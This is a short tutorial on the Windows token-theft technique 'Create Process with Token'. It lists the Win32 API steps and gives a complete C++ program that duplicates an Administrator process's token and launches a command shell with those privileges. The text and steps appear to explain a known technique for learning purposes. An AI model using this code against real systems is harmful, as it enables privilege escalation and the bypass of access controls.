Create Process with Token

Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with DuplicateToken(Ex) and use it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.

Example:

In simple terms, this is when a token of an already exisiting accoes token present in one of the running processes on the victim host, is retrieved, duplicated and then used for creating a new process

Step

Win32 API

Open a process with access token you want to steal

OpenProcess

Get a handle to the access token of that process

OpenProcesToken

Make a duplicate of the access token present in that process

DuplicateTokenEx

Create a new process with the newly aquired access token

CreateProcessWithTokenW

I will weaponize this technique using the following code:

Code:

#include "stdafx.h"#include #include int main(int argc, char * argv[]) {char a;HANDLE processHandle;HANDLE tokenHandle = NULL;HANDLE duplicateTokenHandle = NULL;STARTUPINFO startupInfo;PROCESS_INFORMATION processInformation;DWORD PID_TO_IMPERSONATE = 3060;wchar_t cmdline[] = L"C:\\shell.cmd";ZeroMemory(&startupInfo, sizeof(STARTUPINFO));ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));startupInfo.cb = sizeof(STARTUPINFO);        processHandle = OpenProcess(PROCESS_ALL_ACCESS, true, PID_TO_IMPERSONATE);OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &tokenHandle);DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);                        CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL, &startupInfo, &processInformation);std::cin >> a;    return 0;}

My target here is notepad as it is running with Administrator privileges and for the sake of demonstration purposes. Compiling the previous code with use the proper API calls to grab the token, duplicate it and open cmd prompt with Administrator privileges.

As you can see when running the compiled binary using PowerShell as the parent process of the ConsoleApplication running as the user but cmd process running as Administrator

Create a Process with Token

References: